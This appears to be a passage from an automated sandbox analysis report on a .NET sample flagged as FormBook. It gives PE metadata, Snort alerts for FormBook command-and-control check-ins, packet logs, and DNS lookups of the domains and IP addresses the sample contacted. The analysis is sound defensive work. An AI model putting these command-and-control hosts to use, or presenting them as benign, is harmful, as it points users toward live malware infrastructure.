                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xe10d80xe1200False0.910015269295data7.87688083082IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xe40000x5b40x600False0.422526041667data4.09985063561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xe60000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0xe40900x324data
                                                                  RT_MANIFEST0xe43c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2019
                                                                  Assembly Version1.0.0.0
                                                                  InternalNameTextInfo.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameWinFormBlur
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionWinFormBlur
                                                                  OriginalFilenameTextInfo.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  05/12/21-15:47:49.762126TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.762126TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.762126TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.899209TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.4
                                                                  05/12/21-15:48:07.924397TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:07.924397TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:07.924397TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:24.329476TCP1201ATTACK-RESPONSES 403 Forbidden8049768185.53.177.53192.168.2.4
                                                                  05/12/21-15:48:29.463149TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.463149TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.463149TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.644690TCP1201ATTACK-RESPONSES 403 Forbidden804977023.227.38.74192.168.2.4
                                                                  05/12/21-15:48:35.011543TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164
                                                                  05/12/21-15:48:35.011543TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164
                                                                  05/12/21-15:48:35.011543TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 15:47:49.720372915 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.761607885 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.761939049 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.762125969 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.803127050 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899209023 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899231911 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899401903 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.899447918 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.940536022 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:55.323738098 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.530555010 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:55.530677080 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.530891895 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.737502098 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:56.787616014 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:56.996212006 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:56.996391058 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:48:01.872087955 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.004753113 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.004889011 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.005036116 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.137639046 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140299082 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140330076 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140355110 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140372038 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140397072 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140419006 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140440941 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140460968 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140465021 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140486956 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140507936 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140568018 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140605927 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140696049 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272782087 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272820950 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272845030 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272866011 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272867918 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272891045 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272900105 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272916079 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272938013 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272945881 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272959948 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272970915 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272981882 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273005009 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273005962 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273026943 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273040056 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273050070 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273070097 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273071051 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273097992 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273116112 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273119926 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273139954 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273152113 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273159981 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273179054 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273180962 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273216009 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:07.568507910 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:07.923923969 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:07.924217939 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:07.924396992 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.275038004 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279015064 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279042006 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279299974 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.279356003 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.637468100 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:13.561913967 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.697118998 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.697252989 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.697396994 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.828573942 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.830612898 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.830630064 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.831099033 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.831171989 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.961436033 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:18.927031994 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.007870913 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.008023977 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.008239031 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.089050055 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092015982 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092034101 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092042923 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092062950 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092201948 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092216969 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.092283010 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.092397928 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:24.203677893 CEST4976880192.168.2.4185.53.177.53
                                                                  May 12, 2021 15:48:24.244183064 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:24.244268894 CEST4976880192.168.2.4185.53.177.53
                                                                  May 12, 2021 15:48:24.287178040 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:24.287259102 CEST4976880192.168.2.4185.53.177.53
                                                                  May 12, 2021 15:48:24.329449892 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:24.329476118 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:24.329494953 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:24.329703093 CEST4976880192.168.2.4185.53.177.53
                                                                  May 12, 2021 15:48:24.329817057 CEST4976880192.168.2.4185.53.177.53
                                                                  May 12, 2021 15:48:24.370309114 CEST8049768185.53.177.53192.168.2.4
                                                                  May 12, 2021 15:48:29.421772003 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.462800980 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.462917089 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.463149071 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.504053116 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644690037 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644754887 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644808054 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644862890 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644882917 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.644918919 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644934893 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.644958019 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644994020 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.645020008 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.645047903 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.645144939 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:34.837297916 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.011116028 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.011254072 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.011543036 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.228281975 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250890970 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250931025 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250950098 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.251156092 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.251257896 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.423161983 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:40.368484020 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.409147024 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.409346104 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.409845114 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.450514078 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.450537920 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.450547934 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.451900959 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.451927900 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.492644072 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:45.524482965 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.565601110 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.566040039 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.566056013 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.606976986 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607007027 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607013941 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607312918 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.607326984 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.651376009 CEST804977352.58.78.16192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 15:46:36.814066887 CEST5453153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:36.864743948 CEST53545318.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:37.713713884 CEST4971453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:37.762743950 CEST53497148.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:38.796724081 CEST5802853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:38.845554113 CEST53580288.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:39.592092037 CEST5309753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:39.652911901 CEST53530978.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:42.303510904 CEST4925753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:42.355633020 CEST53492578.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:43.388578892 CEST6238953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:43.440186977 CEST53623898.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:45.350935936 CEST4991053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:45.402674913 CEST53499108.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:46.534737110 CEST5585453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:46.586438894 CEST53558548.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:47.748987913 CEST6454953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:47.801074982 CEST53645498.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:49.071911097 CEST6315353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:49.120729923 CEST53631538.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:50.282104015 CEST5299153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:50.331032991 CEST53529918.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:51.485450029 CEST5370053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:51.544975042 CEST53537008.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:52.761302948 CEST5172653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:52.810089111 CEST53517268.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:53.900584936 CEST5679453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:53.949546099 CEST53567948.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:54.826957941 CEST5653453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:54.880492926 CEST53565348.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:55.795959949 CEST5662753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:55.844654083 CEST53566278.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:56.894179106 CEST5662153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:56.944658041 CEST53566218.8.8.8192.168.2.4
                                                                  May 12, 2021 15:46:58.453923941 CEST6311653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:46:58.505796909 CEST53631168.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:00.779433966 CEST6407853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:00.829524994 CEST53640788.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:09.577151060 CEST6480153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:09.645700932 CEST53648018.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:20.309665918 CEST6172153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:20.362169981 CEST53617218.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:31.677963972 CEST5125553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:31.743438959 CEST53512558.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:45.299787045 CEST6152253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:45.413086891 CEST53615228.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:46.130975962 CEST5233753192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:46.191771030 CEST53523378.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:46.821439981 CEST5504653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:47.108288050 CEST53550468.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:47.545085907 CEST4961253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:47.602678061 CEST53496128.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:48.207484961 CEST4928553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:48.265036106 CEST53492858.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:48.434736967 CEST5060153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:48.502091885 CEST53506018.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.084553003 CEST6087553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.147979021 CEST53608758.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.649899960 CEST5644853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.715104103 CEST53564488.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:49.715118885 CEST5917253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:49.763880014 CEST53591728.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:50.554244041 CEST6242053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:50.611854076 CEST53624208.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:51.538911104 CEST6057953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:51.600545883 CEST53605798.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:52.124300957 CEST5018353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:52.176544905 CEST53501838.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:52.782249928 CEST6153153192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:52.844850063 CEST53615318.8.8.8192.168.2.4
                                                                  May 12, 2021 15:47:54.907033920 CEST4922853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:47:55.083226919 CEST53492288.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:01.799061060 CEST5979453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:01.870407104 CEST53597948.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:07.185003042 CEST5591653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:07.567153931 CEST53559168.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:13.299730062 CEST5275253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:13.560631990 CEST53527528.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:18.851711988 CEST6054253192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:18.925479889 CEST53605428.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:22.347239017 CEST6068953192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:22.414751053 CEST53606898.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:24.136452913 CEST6420653192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:24.190939903 CEST5090453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:24.202259064 CEST53642068.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:24.262418032 CEST53509048.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:29.346699953 CEST5752553192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:29.420010090 CEST53575258.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:34.661406040 CEST5381453192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:34.835792065 CEST53538148.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:40.305569887 CEST5341853192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:40.366614103 CEST53534188.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:45.458513021 CEST6283353192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:45.522173882 CEST53628338.8.8.8192.168.2.4
                                                                  May 12, 2021 15:48:55.627368927 CEST5926053192.168.2.48.8.8.8
                                                                  May 12, 2021 15:48:55.690572977 CEST53592608.8.8.8192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 12, 2021 15:47:49.649899960 CEST192.168.2.48.8.8.80xf9d0Standard query (0)www.thebenefitssherpa.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:47:54.907033920 CEST192.168.2.48.8.8.80x5743Standard query (0)www.onlinecasinocrazy.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.799061060 CEST192.168.2.48.8.8.80x9a46Standard query (0)www.blissfulbeeboutique.onlineA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:07.185003042 CEST192.168.2.48.8.8.80xd198Standard query (0)www.cityofhouston.infoA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:13.299730062 CEST192.168.2.48.8.8.80xaea8Standard query (0)www.socialeconomic.netA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:18.851711988 CEST192.168.2.48.8.8.80x726bStandard query (0)www.toypoodlebreedershome.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:24.136452913 CEST192.168.2.48.8.8.80x30ceStandard query (0)www.ricdevan.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:29.346699953 CEST192.168.2.48.8.8.80xf6e2Standard query (0)www.ximibabes.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:34.661406040 CEST192.168.2.48.8.8.80xcfb4Standard query (0)www.sabaidiving.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:40.305569887 CEST192.168.2.48.8.8.80xb2a5Standard query (0)www.onemoresysadmin.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:45.458513021 CEST192.168.2.48.8.8.80x4cc3Standard query (0)www.countrywideeconomy.comA (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:55.627368927 CEST192.168.2.48.8.8.80xfd6Standard query (0)www.woo.educationA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 12, 2021 15:47:49.715104103 CEST8.8.8.8192.168.2.40xf9d0No error (0)www.thebenefitssherpa.comthebenefitssherpa.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:47:49.715104103 CEST8.8.8.8192.168.2.40xf9d0No error (0)thebenefitssherpa.com34.102.136.180A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:47:55.083226919 CEST8.8.8.8192.168.2.40x5743No error (0)www.onlinecasinocrazy.comonlinecasinocrazy.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:47:55.083226919 CEST8.8.8.8192.168.2.40x5743No error (0)onlinecasinocrazy.com119.81.45.82A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)www.blissfulbeeboutique.onlineext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:01.870407104 CEST8.8.8.8192.168.2.40x9a46No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                  May 12, 2021 15:48:07.567153931 CEST8.8.8.8192.168.2.40xd198No error (0)www.cityofhouston.infocityofhouston.infoCNAME (Canonical name)IN (0x0001)
                                                                  May 12, 2021 15:48:07.567153931 CEST8.8.8.8192.168.2.40xd198No error (0)cityofhouston.info103.15.186.68A (IP address)IN (0x0001)
